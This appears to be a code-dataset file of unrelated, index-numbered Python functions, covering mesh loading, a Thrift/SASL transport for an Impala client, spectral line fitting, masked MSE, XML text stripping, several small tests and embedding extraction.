def loadmesh(basedirMesh, ptcode=None, meshname=None, invertZ=True, fname=None): """ Load Mesh object, flip z and return Mesh meshname includes ctcode """ if fname is None: try: mesh = vv.meshRead(os.path.join(basedirMesh, ptcode, meshname)) except FileNotFoundError: mesh = vv.meshRead(os.path.join(basedirMesh, meshname)) else: try: mesh = vv.meshRead(os.path.join(basedirMesh, ptcode, fname)) except FileNotFoundError: mesh = vv.meshRead(os.path.join(basedirMesh, fname)) if invertZ == True: # z is negative, must be flipped to match dicom orientation CT data mesh._vertices[:, -1] *= -1 return mesh
5,348,689
def get_transport(socket, host, kerberos_service_name, auth_mechanism='NOSASL', user=None, password=None): """ Creates a new Thrift Transport using the specified auth_mechanism. Supported auth_mechanisms are: - None or 'NOSASL' - returns simple buffered transport (default) - 'PLAIN' - returns a SASL transport with the PLAIN mechanism - 'GSSAPI' - returns a SASL transport with the GSSAPI mechanism """ log.debug('get_transport: socket=%s host=%s kerberos_service_name=%s ' 'auth_mechanism=%s user=%s password=fuggetaboutit', socket, host, kerberos_service_name, auth_mechanism, user) if auth_mechanism == 'NOSASL': return TBufferedTransport(socket) # Set defaults for PLAIN SASL / LDAP connections. if auth_mechanism in ['LDAP', 'PLAIN']: if user is None: user = getpass.getuser() log.debug('get_transport: user=%s', user) if password is None: if auth_mechanism == 'LDAP': password = '' else: # PLAIN always requires a password for HS2. password = 'password' log.debug('get_transport: password=%s', password) auth_mechanism = 'PLAIN' # sasl doesn't know mechanism LDAP # Initializes a sasl client from thrift_sasl import TSaslClientTransport try: import sasl # pylint: disable=import-error def sasl_factory(): sasl_client = sasl.Client() sasl_client.setAttr('host', host) sasl_client.setAttr('service', kerberos_service_name) if auth_mechanism.upper() in ['PLAIN', 'LDAP']: sasl_client.setAttr('username', user) sasl_client.setAttr('password', password) sasl_client.init() return sasl_client except ImportError: log.warn("Unable to import 'sasl'. Fallback to 'puresasl'.") from impala.sasl_compat import PureSASLClient def sasl_factory(): return PureSASLClient(host, username=user, password=password, service=kerberos_service_name) return TSaslClientTransport(sasl_factory, auth_mechanism, socket)
5,348,690
def _read_node( data, pos, md_total ): """ 2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2 The quantity of child nodes. The quantity of metadata entries. Zero or more child nodes (as specified in the header). """ child_count = data[ pos ] pos += 1 md_count = data[ pos ] pos += 1 for i in range( child_count ): pos, md_total = _read_node( data, pos, md_total ) for m in range( md_count ): md_total += data[ pos ] pos += 1 return ( pos, md_total )
5,348,691
def _large_flag_fit(x, yDat, yFit, initz, speciesDict, minSize, errBound): """ Attempts to more robustly fit saturated lyman alpha regions that have not converged to satisfactory fits using the standard tools. Uses a preselected sample of a wide range of initial parameter guesses designed to fit saturated lines (see get_test_lines). **Parameters** :x: (N) ndarray array of wavelength :ydat: (N) ndarray array of desired flux profile to be fitted for the wavelength space given by x. Same size as x. :yFit: (N) ndarray array of flux profile fitted for the wavelength space given by x already. Same size as x. :initz: float redshift to try putting first line at (maximum absorption for region) :speciesDict: dictionary dictionary containing all relevant parameters needed to create an absorption line of a given species (f,Gamma,lambda0) as well as max and min values for parameters to be fit :minsize: float minimum absorption allowed for a line to still count as a line given in normalized flux (ie: for minSize=.9, only lines with minimum flux less than .9 will be fitted) :errbound: float maximum total error allowed for an acceptable fit **Returns** :bestP: (3,) ndarray array of best parameters if a good enough fit is found in the form [[N1,b1,z1], [N2,b2,z2],...] """ #Set up some initial line guesses lineTests = _get_test_lines(initz) #Keep track of the lowest achieved error bestError = 1000 #Iterate through test line guesses for initLines in lineTests: if initLines[1,0]==0: initLines = np.delete(initLines,1,axis=0) #Do fitting with initLines as first guess linesP,flag=_complex_fit(x,yDat,yFit,initz, minSize,errBound,speciesDict,initP=initLines) #Find error of last fit yNewFit=_gen_flux_lines(x,linesP,speciesDict) dif = yFit*yNewFit-yDat errSq=sum(dif**2) #If error lower, keep track of the lines used to make that fit if errSq < bestError: bestError = errSq bestP = linesP if bestError>10*errBound*len(x): return [] else: return bestP
5,348,692
def mse_large_arrays_masked(dataA: 'LargeArray', dataB: 'LargeArray', mask: 'LargeArray', dtype: Type, batchSizeFlat=1e8): """ Compute MSE between two HDF datasets, considering elements where the mask is set to true (one). Computation is performed in batches to decrease memory requirements. """ if dataA.shape != dataB.shape or dataA.shape != mask.shape: raise ValueError("Arguments should have equal shapes, {}, {} and {} given." .format(dataA.shape, dataB.shape, mask.shape)) sum = 0.0 count = 0 for batchStart, batchEnd in get_batch_indices(dataA.shape, dtype, batchSizeFlat): batchMask = mask[batchStart:batchEnd] diff = batchMask * (dataA[batchStart:batchEnd].astype(dtype) - dataB[batchStart:batchEnd].astype(dtype)) square = np.square(diff) nonzeroNumber = np.count_nonzero(batchMask) sum += np.sum(square) count += nonzeroNumber return sum / count if count > 0 else float('nan')
5,348,693
def test_shell_cmd_inputs_1(): """additional input with provided position""" my_input_spec = SpecInfo( name="Input", fields=[ ( "inpA", attr.ib( type=str, metadata={"position": 1, "help_string": "inp1", "argstr": ""}, ), ) ], bases=(ShellSpec,), ) shelly = ShellCommandTask( executable="executable", args="arg", inpA="inp1", input_spec=my_input_spec ) assert shelly.cmdline == "executable inp1 arg"
5,348,694
def xml_elem_or_str_to_text(elem_or_xmlstr, default_return=""): """ Return string with all tags stripped out from either etree element or xml marked up string If string is empty or None, return the default_return >>> root = etree.fromstring(test_xml) >>> xml_elem_or_str_to_text(test_xml, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> xml_elem_or_str_to_text(root, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> root = etree.fromstring("<myxml>this <b>is <i>really</i><empty/></b> xml.</myxml>", None) #mixed content element >>> xml_elem_or_str_to_text(root, None) 'this is really xml.' >>> isinstance(xml_elem_or_str_to_text(root, None), str) # make sure it's string True >>> xml_elem_or_str_to_text(xml_xpath_return_textsingleton(root, "pxxx", ""), None) """ ret_val = default_return if elem_or_xmlstr is None or elem_or_xmlstr == "": ret_val = default_return elif isinstance(elem_or_xmlstr, lxml.etree._ElementUnicodeResult): ret_val = "%s" % elem_or_xmlstr # convert to string # just in case the caller sent a string. else: try: if isinstance(elem_or_xmlstr, str): parser = lxml.etree.XMLParser(encoding='utf-8', recover=True) elem = etree.fromstring(elem_or_xmlstr.encode("utf8"), parser) else: elem = copy.copy(elem_or_xmlstr) # etree will otherwise change calling parm elem_or_xmlstr when stripping except Exception as err: logger.error(err) ret_val = default_return try: etree.strip_tags(elem, '*') inner_text = elem.text if inner_text: ret_val = inner_text.strip() else: ret_val = default_return except Exception as err: logger.error("xmlElemOrStrToText: ", err) ret_val = default_return if ret_val == "": ret_val = default_return return ret_val
5,348,695
def sequence_equals(sequence1, sequence2): """ Inspired by django's self.assertSequenceEquals Useful for comparing lists with querysets and similar situations where simple == fails because of different type. """ assert len(sequence1) == len(sequence2), (len(sequence1), len(sequence2)) for item_from_s1, item_from_s2 in zip(sequence1, sequence2): assert item_from_s1 == item_from_s2, (item_from_s1, item_from_s2) return True
5,348,696
def test_load_external(): """ This function tests if a model that has been trained on a different computer can be loaded and used on a different computer. """ x = np.linspace(-10.0, 10.0, 2000) y = x ** 2 x = np.reshape(x, (x.shape[0], 1)) estimator = MRMP() estimator.load_nn("saved_model") score_after_loading = estimator.score(x, y) score_on_other_machine = -24.101043 assert np.isclose(score_after_loading, score_on_other_machine)
5,348,697
def create_or_update_user_profile(sender, instance, created, **kwargs): """If the User is being created and does not have a UserProfile model, create one.""" if created or not hasattr(instance, 'userprofile'): UserProfile.objects.create(user=instance) instance.profile.save()
5,348,698
def extract_parameters_by_usrDict(preModel, preDict, usrModel, usrDict, paraDim): """ Extract desired parameters from a pretrained embedding model based on user dictionary """ if paraDim not in [32, 64, 128, 256]: raise RuntimeError("We only support 32, 64, 128, 256 dimensions now") fi = open(preModel, "rb") fo = open(usrModel, "wb") # write filehead rowIndex = get_row_index(preDict, usrDict) newHead = struct.pack("iil", 0, 4, len(rowIndex) * paraDim) fo.write(newHead) bytes = 4 * paraDim for i in range(0, len(rowIndex)): # find the absolute position of input file fi.seek(rowIndex[i] * bytes + 16, 0) fo.write(fi.read(bytes)) print "extract parameters finish, total", len(rowIndex), "lines" fi.close()
5,348,699